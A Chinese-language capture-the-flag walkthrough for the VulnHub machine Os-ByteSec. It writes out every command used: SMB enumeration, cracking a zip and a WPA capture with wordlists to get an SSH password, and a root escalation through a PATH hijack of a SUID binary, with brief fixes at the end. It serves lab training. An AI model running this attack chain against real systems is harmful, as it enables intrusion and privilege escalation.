[原创]靶机系列测试教程 Os-ByteSec
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
1 交流平台
随着教程的推出,看视频的人也越来越多,随之而来的问题也增多,本人平时非常忙,难以有时间回复大家的问题,特意建立了一个QQ群,里面有很多这方面的高手,有什么不懂的,请到群里提问,问问题的时候,一定要详细,不然没人会回复你,另外本人有时间会在群内直播测试靶机,还没加上群的赶快加上了。
2 靶机介绍
下载地址
https://www.vulnhub.com/entry/hacknos-os-bytesec,393/
难度 为中级
3 测试过程
3.1 nmap端口探查
nmap -sV -sC 192.168.0.159 -oA os-bytesec-allport
发现目标的端口服务器有
139 445 为smb服务 netBions name NITIN
smbba4.3.11 Ubuntu
80端口为web服务
2525 端口为 ssh 服务
3.2 网站目录扫描
gobuster dir -u http://192.168.0.159 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
/news (Status: 301)
/img (Status: 301)
/html (Status: 301)
/gallery (Status: 301)
/css (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
3.3 访问80端口
3.4 检测smb服务安全
3.4.1 使用nmap检测 smb服务
nmap -v -p139,445 –script=smb-vuln-*.nse –script-args=unsafe=1 192.168.0.159
发现没有可以利用的
3.1.2 smbmap 列出共享
smbmap -H 192.168.0.159
发现可以匿名访问但是均都没有任何权限
3.1.3 enum4linux 测试smb安全
enum4linux -U 192.168.0.159
可以匿名登录 同时发现存在smb用户
enum4linux 192.168.0.159
上面这条命令 全方位测试smb服务安全 枚举用户 共享文件
发现用户 sagar blackjax smb
把重点放在smb用户上
3.1.4 用smbmap列出用户共享目录
smbmap -H 192.168.0.159 -u smb
3.1.5smbclient 访问目录
smbclient 访问smb隐藏目录
smbclient //192.168.0.159/smb -U smb
密码为空 用过命令ls 列出当前文件。
get main.txt safe.zip
通过get命令下载这两个文件
4 fcrackzip破解zip文件
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
4.1.2 破解 user.cap文件
解压unzip safe.zip 得到两个文件
user.cap里面是一些包信息。
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
得到ESSID的名字 blackjax KEY snowflake
4.2 登录ssh
ssh -p 2525 blackjax@192.168.0.159
4.3 获取user.txt
4.4 特权提升
4.4.1 找到suid文件
查找根本目录下所有带用suid属性的文件
find / -type f -perm -u=s 2>/dev/null
运行netscan
发现与netstat -tlnp相似
4.5 分析netscan文件
xxd /usr/bin/netscan | less
发现调用netstat命令
4.5提权root
4.5.1 创建文件netstat
cd /tmp
echo “/bin/sh” >netstat
chmod 775 netstat
4.5.2 设置环境变量PATH
查看当前环境变量echo $PATH
设置环境变量
export PATH=/tmp:$PATH
netscan
4.5.3拿到root.txt
5 修复建议
- 设置smb用户密码
- netscan命令 去掉s属性
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/709.html